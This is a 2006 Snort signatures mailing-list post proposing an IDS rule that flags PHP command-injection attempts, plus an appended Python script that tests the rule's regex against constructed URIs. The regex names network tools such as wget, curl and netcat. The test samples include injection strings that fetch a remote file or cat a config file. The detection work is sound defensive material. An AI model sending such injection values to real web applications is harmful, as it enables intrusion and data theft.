[Snort-sigs] Sig 1147

Jamie Riden jamesr at ...3216...
Fri May 26 05:04:22 EDT 2006


On 26/04/06, nnposter at ...592...
<nnposter at ...592...> wrote:
<snip>
> If you really, really insist on this rule even though the vulnerability
> is so old you should do something like:

(The given vulnerability is old, but the 'cat%20' payload could easily
occur in exploits for recent PHP command injection problems.)

>     flow:to_server,established;
>     uricontent:"webdist.cgi";
>     pcre:"/webdist\.cgi.+\bcat[ \t]/U";
<snip>
> Cheers,
> nnposter

The cat%20 rule was causing me too many false positives (including
this message I expect :). Instead of turning it off, what about
combining as follows:

alert tcp any any -> any any (msg:"WEB-ATTACKS web command attempt"; \
flow:to_server,established; uricontent:"\.php?"; \
pcre:"/\b(wget|curl|cc|chgrp|kill|chown|echo|rm|lsof|ls|perl|ping|netcat|cat|nc|nmap|gcc|g\+\+|traceroute|ftp|tftp)[ \t]/U"; \
classtype:web-application-activity; sid:2123156; rev:1;)

Any problems with this? Hopefully it should catch people trying to
exploit the vulnerable PHP script du jour. (Every time a new remote
include or command injection problem comes out (e.g. the Horde issue last
week), someone sees if they can 'wget' their favourite rootkit.)

Is it more efficient to create more rules with uricontent:"\.pl",
"\.cgi", or is it better to match both, and .cgi in the pcre as well?

cheers,
 Jamie
--
Jamie Riden / jamesr at ...3216... / jamie.riden at ...3217...
"Microsoft: Bringing the world to your desktop - and your desktop to
 the world." -- Peter Gutmann
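As an added example (not part of Jamie's post or of any Snort ruleset), the combined pcre from the message run over constructed request URIs in Python. The /U modifier's URI normalization is approximated with a plain percent-decode, and uricontent:"\.php?" is assumed to mean the literal string ".php?"; the rows show both the intended hits and the plain-English false positives the post is worried about, plus a .cgi request the .php? pre-filter never reaches.

```python
import re
from urllib.parse import unquote

# The combined pcre from the post, as a Python regex. Snort's /U modifier
# applies it to the normalized (percent-decoded) URI, hence normalize_uri().
COMMAND_RE = re.compile(
    r"\b(wget|curl|cc|chgrp|kill|chown|echo|rm|lsof|ls|perl|ping|netcat|cat"
    r"|nc|nmap|gcc|g\+\+|traceroute|ftp|tftp)[ \t]"
)
# Assumption: uricontent:"\.php?" is taken as the literal string ".php?".
URICONTENT = ".php?"

def normalize_uri(raw_uri: str) -> str:
    """Simplified stand-in for http_inspect's URI normalization:
    percent-decode once and treat '+' in the query as a space."""
    path, sep, query = raw_uri.partition("?")
    return unquote(path) + sep + unquote(query.replace("+", " "))

def rule_fires(raw_uri: str) -> bool:
    """True only when the uricontent pre-filter and the pcre both match."""
    uri = normalize_uri(raw_uri)
    return URICONTENT in uri and COMMAND_RE.search(uri) is not None

def classify(requests):
    """Return (uri, fired, label) for each constructed (uri, label) sample."""
    return [(uri, rule_fires(uri), label) for uri, label in requests]

# Constructed sample URIs (hypothetical hosts and parameter names).
# 'attack' rows mimic the command-injection shape the rule targets; 'benign'
# rows are ordinary query strings in which the same words appear as English.
SAMPLES = [
    ("/page.php?cmd=wget%20http://example.test/x", "attack"),
    ("/index.php?id=1;cat%20config.inc", "attack"),
    ("/search.php?q=cat+food", "benign"),               # 'cat ' as a word: false positive
    ("/blog.php?title=echo%20chamber", "benign"),       # 'echo ' as a word: false positive
    ("/view.php?item=concatenate%20files", "benign"),   # \b stops 'cat' inside a word
    ("/cgi-bin/webdist.cgi?distloc=;cat%20config.inc", "attack"),  # no .php?: never checked
]

if __name__ == "__main__":
    for uri, fired, label in classify(SAMPLES):
        print(f"{'FIRE' if fired else 'pass'} [{label}] {uri}")
```

The last row is the case behind the .pl/.cgi question: whatever the pcre would match, a request that fails the uricontent pre-filter is never handed to it.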